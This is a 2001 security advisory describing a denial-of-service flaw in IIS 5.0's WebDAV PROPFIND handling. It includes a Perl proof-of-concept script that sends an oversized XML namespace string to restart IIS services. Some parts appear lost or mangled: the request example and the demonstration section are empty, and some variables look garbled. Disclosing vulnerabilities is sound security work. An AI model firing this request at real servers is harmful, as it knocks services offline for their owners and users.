Georgi Guninski security advisory #38, 2001
IIS 5.0 PROPFIND DOS
Systems affected:
IIS 5.0
Risk: Medium but may turn more serious
Date: 8 March 2001
Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it
unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's
written permission.
Disclaimer:
The opinions expressed in this advisory and program are my own and not of any
company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or indirect use of the
information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory
or program or
any derivatives thereof.
Description:
It is possible to remotely restart all IIS related service using specially
crafted request.
It is also possible to force IIS to consume memory which it does not free.
Seems to be a buffer overflow, don't know whether it is exploitable, let me know
if you find
a way to exploit it.
Details:
where length($over) ~ 128008
The first time the request is send IIS replies with 500 … Exception. The
second time the services are
restarted.
–vv5.pl-------------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
print "IIS 5.0 propfind\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$[0]; #length of buffer
$ch=$[1];
$over=$ch x $ll; #string to overflow
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto =>
"TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:"
xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over
/>".'</a:prop></a:propfind>'."\n\n";
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:"
xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over
/>".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length:
$l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}
Demonstration:
Workoround: Disable WebDav extensions and PROPFIND though I do not recommend
using IIS on the Internet.
Vendor status:
Microsoft was informed on 3 March 2001
Happy 8 March to the women.
Regards,
Georgi Guninski
http://www.guninski.com